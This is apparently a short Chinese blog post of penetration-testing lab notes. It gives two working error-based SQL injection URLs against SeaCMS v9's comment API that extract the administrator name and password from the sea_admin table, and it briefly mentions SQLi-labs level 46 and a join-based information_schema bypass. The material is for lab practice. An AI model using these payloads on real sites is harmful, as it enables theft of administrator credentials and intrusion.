当前位置: 首页 > article >正文

渗透测试实验

article 2025/2/26 13:49:22

1、seacmsv9注入管理员密码

获取管理员账号(name)

http://www.test2.com/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20(name)from%20sea_admin))),@`%27`

 

2、获取管理员密码

 http://www.test2.com/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20(password)from%20sea_admin))),@`%27`

 

2、SQLilabs第46关 

 

使用?sort=1/2其排序不同,可以得知使用了orderby语句,存在漏洞。使用python脚本获取数据。

3、information_schema的绕过

使用join的子查询


http://www.kler.cn/a/561805.html

相关文章:

  • 【算法】 ‘abb‘ 型子序列问题——前后缀分解 python
  • Spark on Yarn 多机集群部署
  • RBAC授权
  • 【透视图像目标检测(4)】DD3D输出3D障碍物信息的过程
  • 【项目测试】博客系统—Selenium自动化测试、编写测试用例
  • 萌新学 Python 之闭包函数
  • low rank decomposition如何用于矩阵的分解
  • C++基础02(函数)
  • 编写一个程序,计算并输出1到100的和(Python版)
  • <02.25>Leetcode100
  • DeepSeek-R1技术全解析:如何以十分之一成本实现OpenAI级性能?
  • 全方位监控AWS Application Load Balancer异常情况实战
  • 基于GO语言的车牌识别api技术-港澳车牌文字识别
  • 微软开源神器OmniParser-v2.0本地部署教程
  • git | 团队协作开发注意事项
  • 【Blender】三、材质篇--01,Blender材质基础 原理化BSDF
  • 大模型输出markdown格式前端对话框
  • 深入理解C++ 线程池:动手实践与源码解析
  • 是德科技keysight N5173B信号发生器,是一款经济高效的仪器
  • Java多线程中的死锁问题